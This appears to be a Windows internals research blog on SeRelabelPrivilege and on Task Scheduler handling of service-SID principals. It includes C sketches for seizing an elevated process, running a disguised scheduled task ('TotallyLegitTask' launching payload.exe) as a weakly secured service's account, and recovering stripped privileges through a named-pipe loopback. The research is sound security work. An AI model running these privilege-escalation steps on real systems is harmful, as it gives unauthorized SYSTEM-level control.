This leads into the most misunderstood part, which, if you squint, you might be able to grasp from the privilege's documentation. The ability to lower the label of a resource is mostly dependent on whether the caller can get WRITE_OWNER access to the resource. However, the WRITE_OWNER access right is typically part of GENERIC_ALL in the generic mapping, which means it will never be granted to a caller with a lower integrity level regardless of the DACL or whether they're the owner. 

This is the interesting thing the privilege brings to the lowering operation: it allows the caller to circumvent the MIC check for WRITE_OWNER. The caller can therefore open a higher-labeled resource for WRITE_OWNER and then change the label to any level it likes. This works the same way as SeTakeOwnershipPrivilege, in that it grants WRITE_OWNER without ever checking the DACL. However, if you use SeTakeOwnershipPrivilege it's still subject to the MIC check and will not grant access if the label is above the caller's integrity level.

The problem with this privilege is down to the design of MIC, specifically that WRITE_OWNER is overloaded to allow setting the resource's mandatory label but also its traditional use of setting the owner. There's no way for the kernel to distinguish between the two operations once the access has been granted (or at least it doesn't try to distinguish). 

Surely there's some limitation on what type of resource can be granted WRITE_OWNER access? Nope, it seems that even if the caller does not have any access rights to the resource it will still be granted WRITE_OWNER access. This makes SeRelabelPrivilege exactly like SeTakeOwnershipPrivilege but with the added feature of circumventing the MIC check. Summarizing, a token with SeRelabelPrivilege enabled can take ownership of any resource it likes, even one which has a higher label than the caller.

You can of course verify this yourself, here's a PowerShell script using NtObjectManager which you should run as an administrator. The script creates a security descriptor which doesn't grant SYSTEM any access, then tries to request WRITE_OWNER without and with SeRelabelPrivilege enabled.

PS> $sd = New-NtSecurityDescriptor "O:ANG:AND:(A;;GA;;;AN)" -Type Directory
PS> Invoke-NtToken -System {
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status               Granted Access Privileges
------               -------------- ----------
STATUS_ACCESS_DENIED 0              NONE

PS> Invoke-NtToken -System {
   Enable-NtTokenPrivilege SeRelabelPrivilege
   Get-NtGrantedAccess -SecurityDescriptor $sd -Access WriteOwner -PassResult
}
Status         Granted Access Privileges
------         -------------- ----------
STATUS_SUCCESS WriteOwner     SeRelabelPrivilege

The fact that this behavior is never made explicit is probably why my friend hadn't realized what it allowed. That, coupled with the privilege's rare usage, only being granted by default to SYSTEM, means it's not really a problem in any meaningful sense. It would be interesting to know the design choices which led to the privilege being created; it seems like its role was significantly more important at some point and became almost vestigial during the Vista development process. 

If you've read this far, is there any actually useful scenario for this privilege? The only resources which typically have elevated labels are processes and threads. You can already circumvent the MIC check using SeDebugPrivilege, but usage of that privilege is probably watched like a hawk. So you could instead abuse this privilege to get full access to an elevated process, by changing the owner to the caller and lowering the label. Once you're the owner with a low label you can then modify the DACL to grant full access directly without SeDebugPrivilege.
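Here's a hedged, untested sketch of that scenario, assuming the caller is already impersonating a SYSTEM token with SeRelabelPrivilege enabled and pid is the elevated target process; the helper name is made up and error handling is omitted:

#include <windows.h>
#include <sddl.h>
#include <aclapi.h>

// Get full access to a higher-labeled process without SeDebugPrivilege.
HANDLE TakeOverProcess(DWORD pid) {
  // SeRelabelPrivilege grants WRITE_OWNER regardless of the DACL or the label.
  HANDLE process = OpenProcess(WRITE_OWNER, FALSE, pid);

  // Make SYSTEM (the account we're impersonating) the owner and drop the
  // label to Medium in a single call.
  BYTE owner_buf[SECURITY_MAX_SID_SIZE];
  DWORD owner_len = sizeof(owner_buf);
  CreateWellKnownSid(WinLocalSystemSid, NULL, owner_buf, &owner_len);
  PSECURITY_DESCRIPTOR label_sd = NULL;
  ConvertStringSecurityDescriptorToSecurityDescriptorW(
      L"S:(ML;;NW;;;ME)", SDDL_REVISION_1, &label_sd, NULL);
  BOOL present = FALSE, defaulted = FALSE;
  PACL sacl = NULL;
  GetSecurityDescriptorSacl(label_sd, &present, &sacl, &defaulted);
  SetSecurityInfo(process, SE_KERNEL_OBJECT,
                  OWNER_SECURITY_INFORMATION | LABEL_SECURITY_INFORMATION,
                  (PSID)owner_buf, NULL, NULL, sacl);
  CloseHandle(process);

  // As the owner we're implicitly granted WRITE_DAC, so grant Everyone full
  // access (illustrative only) and reopen the process for all access.
  process = OpenProcess(WRITE_DAC, FALSE, pid);
  PSECURITY_DESCRIPTOR dacl_sd = NULL;
  ConvertStringSecurityDescriptorToSecurityDescriptorW(
      L"D:(A;;GA;;;WD)", SDDL_REVISION_1, &dacl_sd, NULL);
  PACL dacl = NULL;
  GetSecurityDescriptorDacl(dacl_sd, &present, &dacl, &defaulted);
  SetSecurityInfo(process, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
                  NULL, NULL, dacl, NULL);
  CloseHandle(process);
  LocalFree(label_sd);
  LocalFree(dacl_sd);
  return OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
}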

However, as only SYSTEM gets the privilege by default you'd need to impersonate a SYSTEM token, which would probably just allow you to access the process anyway. So it's mostly a useless quirk, unless the system you're looking at has granted it to service accounts, which might then open the door slightly to escaping to SYSTEM.

A Little More on the Task Scheduler's Service Account Usage

Recently I was playing around with a service which was running under a full virtual service account, rather than LOCAL SERVICE or NETWORK SERVICE, but which had SeImpersonatePrivilege removed. Looking for a solution I recalled that Andrea Pierini had posted a blog about using virtual service accounts, so I thought I'd look there for inspiration. One interesting thing he mentioned is that a technique abusing the task scheduler, found by Clément Labro, which worked for LS or NS, didn't work when using virtual service accounts. I thought I should investigate further, out of curiosity, and in the process I found a sneaky technique you can use for other purposes.

I've already blogged about the task scheduler's use of service accounts. Specifically, in a previous blog post I discussed how you could get the TrustedInstaller group by running a scheduled task using the service SID. As the service SID has the same name as the one used for a virtual service account, it's clear that the problem lies in the way this functionality is implemented and that it's likely distinct from how LS or NS tokens are created.

The core process creation code for the task scheduler in Windows 10 is actually in the Unified Background Process Manager (UBPM) DLL, rather than in the task scheduler itself. Taking a quick look at that DLL we find the following code:

HANDLE UbpmpTokenGetNonInteractiveToken(PSID PrincipalSid) {
  // ...
  if (UbpmUtilsIsServiceSid(PrincipalSid)) {
    return UbpmpTokenGetServiceAccountToken(PrincipalSid);
  }
  if (EqualSid(PrincipalSid, kNetworkService)) {
    Domain = L"NT AUTHORITY";
    User = L"NetworkService";
  } else if (EqualSid(PrincipalSid, kLocalService)) {
    Domain = L"NT AUTHORITY";
    User = L"LocalService";
  }
  HANDLE Token;
  if (LogonUserExExW(User, Domain, Password,
      LOGON32_LOGON_SERVICE,
      LOGON32_PROVIDER_DEFAULT, &Token)) {
    return Token;
  }
  // ...
}


The UbpmpTokenGetNonInteractiveToken function takes the principal SID from the task registration (or passed to RunEx) and determines what it represents in order to get back the token. It checks if the SID is a service SID, by which it means the NT SERVICE\NAME SID we used in the previous blog post. If it is, it calls a separate function, UbpmpTokenGetServiceAccountToken, to get the service token.

Otherwise, if the SID is NS or LS then it specifies the well known names for those SIDs and calls LogonUserExEx with the LOGON32_LOGON_SERVICE type. The UbpmpTokenGetServiceAccountToken function does the following:

HANDLE UbpmpTokenGetServiceAccountToken(PSID PrincipalSid) {
  LPCWSTR Name = UbpmUtilsGetAccountNamesFromSid(PrincipalSid);
  SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
  SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
  HANDLE Token;
  GetServiceProcessToken(g_ScheduleServiceHandle, service, &Token);
  return Token;
}

This function gets the name from the service SID, which is just the name of the service itself, and opens the service for all access rights (SERVICE_ALL_ACCESS). If that succeeds it passes the service handle to an undocumented SCM API, GetServiceProcessToken, which returns the token for the service. Looking at the implementation in the SCM, this basically uses the exact same code as it would use for creating the token when starting the service. 

This is why there's a distinction between LS/NS and a virtual service account when using Clément's technique. If you use LS/NS the task scheduler gets a fresh token from LSA with no regard to how the service is configured, therefore the new token has SeImpersonatePrivilege (or whatever else is allowed). However, for a virtual service account the task scheduler asks the SCM for the service's token, and as the SCM knows what restrictions are in place it honours things like stripped privileges or the SID type. Therefore the returned token will again be missing SeImpersonatePrivilege, even though it'll technically be a different token to the one the currently running service has.

Why does the task scheduler need an undocumented function to get the service token? As I mentioned in a previous blog post about virtual accounts, only the SCM (well, technically the first process to claim it's the SCM) is allowed to authenticate a token with a virtual service account. This seems kind of pointless if you ask me, as you already need SeTcbPrivilege to create the service token, but it is what it is.

Okay, so now we know why Clément's technique doesn't get you back any privileges. You might now be asking, so what? Well, one interesting behavior came from looking at how the task scheduler determines if you're allowed to specify a service SID as a principal. In my blog post on creating a task running as TrustedInstaller I implied it needed administrator access, which is sort of true and sort of not. Let's see the function the task scheduler uses to determine if the caller is allowed to run a task as a specified principal.

BOOL IsPrincipalAllowed(User& principal) {
  RpcAutoImpersonate::RpcAutoImpersonate();
  User caller;
  User::FromImpersonationToken(&caller);
  RpcRevertToSelf();
  if (tsched::IsUserAdmin(caller) || caller.IsLocalSystem(caller)) {
    return TRUE;
  }

  if (principal == caller) {
    return TRUE;
  }

  if (principal.IsServiceSid()) {
    LPCWSTR Name = principal.GetAccount();
    RpcAutoImpersonate::RpcAutoImpersonate();
    SC_HANDLE scm = OpenSCManager(NULL, NULL, SC_MANAGER_CONNECT);
    SC_HANDLE service = OpenService(scm, Name, SERVICE_ALL_ACCESS);
    RpcRevertToSelf();
    if (service) {
      return TRUE;
    }
  }
  return FALSE;
}

The IsPrincipalAllowed function first checks if the caller is an administrator or SYSTEM. If it is, then any principal is allowed (again not completely true, but good enough). Next it checks if the caller's user SID matches the principal being set. This is what allows NS/LS or a virtual service account to specify a task running as their own user account. 


Finally, if the principal is a service SID, then it tries to open the service for full access while impersonating the caller. If that succeeds it allows the service SID to be used as a principal. This behaviour is interesting as it allows for a sneaky way to abuse badly configured services. 


It's a well-known privilege escalation check to enumerate all local services and see if any of them grant a normal user privileged access rights, mainly SERVICE_CHANGE_CONFIG. This is enough to hijack the service and get arbitrary code running as the service account. A common trick is to change the executable path and restart the service, but this isn't great for a few different reasons.

  1. Changing the executable path could easily be noticed.
  2. You probably want to fix the path back again afterwards, which is just a pain.
  3. If the service is currently running you'll need to stop it, then restart the modified service to get code execution.
However, as long as your account is granted full access to the service you can use the task scheduler even without being an administrator to get code running as the service's user account, such as SYSTEM, without ever needing to modify the service's configuration directly or stop/start the service. Much more sneaky. Of course this does mean that the token the task runs under might have privileges stripped etc, but that's something which is easy enough to deal with (as long as it's not write restricted).
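As a rough, untested sketch of the idea, here's how this might look using the public Task Scheduler COM API, assuming a hypothetical VulnSvc service which has granted our user SERVICE_ALL_ACCESS; the task name and payload path are placeholders and error handling is omitted:

#include <windows.h>
#include <taskschd.h>
#include <comdef.h>
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")

int wmain() {
  CoInitializeEx(nullptr, COINIT_MULTITHREADED);
  ITaskService* service = nullptr;
  CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER,
                   IID_ITaskService, (void**)&service);
  service->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
  ITaskFolder* root = nullptr;
  service->GetFolder(_bstr_t(L"\\"), &root);

  ITaskDefinition* task = nullptr;
  service->NewTask(0, &task);

  // The interesting part: set the principal to the service SID. The scheduler's
  // IsPrincipalAllowed check passes because we can open VulnSvc for all access.
  IPrincipal* principal = nullptr;
  task->get_Principal(&principal);
  principal->put_UserId(_bstr_t(L"NT SERVICE\\VulnSvc"));
  principal->put_LogonType(TASK_LOGON_SERVICE_ACCOUNT);

  // Run an arbitrary executable as the action.
  IActionCollection* actions = nullptr;
  task->get_Actions(&actions);
  IAction* action = nullptr;
  actions->Create(TASK_ACTION_EXEC, &action);
  IExecAction* exec = nullptr;
  action->QueryInterface(IID_IExecAction, (void**)&exec);
  exec->put_Path(_bstr_t(L"C:\\temp\\payload.exe"));

  IRegisteredTask* registered = nullptr;
  root->RegisterTaskDefinition(_bstr_t(L"TotallyLegitTask"), task,
      TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(),
      TASK_LOGON_SERVICE_ACCOUNT, _variant_t(L""), &registered);

  // No trigger needed, just run it on demand.
  IRunningTask* running = nullptr;
  registered->Run(_variant_t(), &running);
  CoUninitialize();
  return 0;
}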

This is a good lesson on why you should never take things at face value. I just assumed the caller would need administrator privileges to set a service account as the principal for a task, but it seems that's not actually required if you dig into the code. Hopefully someone will find it useful.

Footnote: If you've read this far, you might also ask, can you get back SeImpersonatePrivilege from a virtual service account or not? Of course, you just use the named pipe trick I described in a previous blog post. Because of the way that the token is created, the token stored in the logon session will still have all the assigned privileges. You can extract that token by using a named pipe to connect back to your own service, and then use it to create a new process and get back all the missing privileges.
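For reference, here's a minimal, untested sketch of that trick as it might run inside the stripped service; the pipe name is arbitrary, error handling is omitted, and it assumes the localhost SMB loopback authenticates using the service's logon session and that SeAssignPrimaryTokenPrivilege wasn't also stripped (otherwise just impersonate the extracted token instead of calling CreateProcessAsUser):

#include <windows.h>

void RecoverFullToken(void) {
  // Server end of the pipe in our own process.
  HANDLE pipe = CreateNamedPipeW(L"\\\\.\\pipe\\recover_token",
      PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 1, 0, 0, 0, NULL);
  // Connect back to ourselves via localhost so the connection is authenticated
  // by LSA using the logon session's credentials rather than our stripped token.
  HANDLE client = CreateFileW(L"\\\\localhost\\pipe\\recover_token",
      GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
  ConnectNamedPipe(pipe, NULL);  // Returns ERROR_PIPE_CONNECTED, which is fine.
  // The server must read at least one byte before it can impersonate the client.
  char ch = 0;
  DWORD bytes;
  WriteFile(client, &ch, 1, &bytes, NULL);
  ReadFile(pipe, &ch, 1, &bytes, NULL);
  ImpersonateNamedPipeClient(pipe);

  // Grab the freshly created token and turn it into a primary token.
  HANDLE token, primary;
  OpenThreadToken(GetCurrentThread(), TOKEN_DUPLICATE | TOKEN_QUERY, TRUE, &token);
  DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation,
                   TokenPrimary, &primary);
  RevertToSelf();

  // Spawn a new process with the unstripped token.
  STARTUPINFOW si = { sizeof(si) };
  PROCESS_INFORMATION pi;
  CreateProcessAsUserW(primary, L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL,
                       FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
}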





